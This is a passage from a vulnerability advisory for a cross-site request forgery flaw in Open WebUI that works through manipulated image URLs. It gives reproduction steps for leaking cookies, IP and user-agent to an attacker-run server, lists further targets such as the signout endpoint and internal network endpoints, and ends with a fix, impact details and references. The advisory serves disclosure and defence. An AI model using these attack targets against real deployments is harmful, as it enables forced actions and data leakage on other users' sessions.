/workspace/models\n\n2. Notice GET request sent to malicious url\n\n\u003cimg width=\"1793\" height=\"482\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bda6e687-ccad-4914-a779-281dc67ffcfe\" /\u003e\n\n\n\n\n**Step 5: Verify User Information Is Sent**\n\n1. On the set up server verify that improperly set cookies are sent, IP, user-agent, etc.\n\n\u003cimg width=\"1687\" height=\"910\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c783ad50-6701-4df8-8beb-ba0957baa2d9\" /\u003e\n\n### Other Attack Examples\n\n- Alternative malicious links\n\n- Signout of Open WebUI\n\n - /api/v1/auths/signout\n\n- Internal network endpoints\n\n- Signout of other applications\n\n- Resource intensive endpoints\n\n- Etc\n\n\n### Recommended Fix\n\n- Store images\n\n - Instead of sending a GET request to load the image each time, store the image and render on the page\n\n- Validate input\n\n - Image file types should be whitelisted (examples: .jpg, .png, .gif, .jpeg, etc)\n\n\n## Impact\n\n### Vulnerability Type\n\n- CWE-352: Cross-Site Request Forgery (CSRF)\n\n- CWE-20: Improper Input Validation\n\n### Affected users\n\n- All authenticated users\n\n\nThe impact of this vulnerability is significant. This application-wide vulnerability allows an attacker to perform actions on behalf of any user who views the compromised image. This can be particularly damaging if an administrator or privileged user views the image, as it could lead to elevated access or sensitive data exposure.",
"id": "GHSA-j6w6-986j-2m2m",
"modified": "2026-05-19T15:58:56Z",
"published": "2026-05-14T20:18:42Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45317"
},
{
"type": "PACKAGE",
"url": "https://github.com/open-webui/open-webui"
},
{
"type": "WEB",
"url": "https://github.com/open-webui/open-webui/releases/tag/v0.9.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Open WebUI Vulnerable to Cross-Site Request Forgery (CSRF) via Image URL Manipulation"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.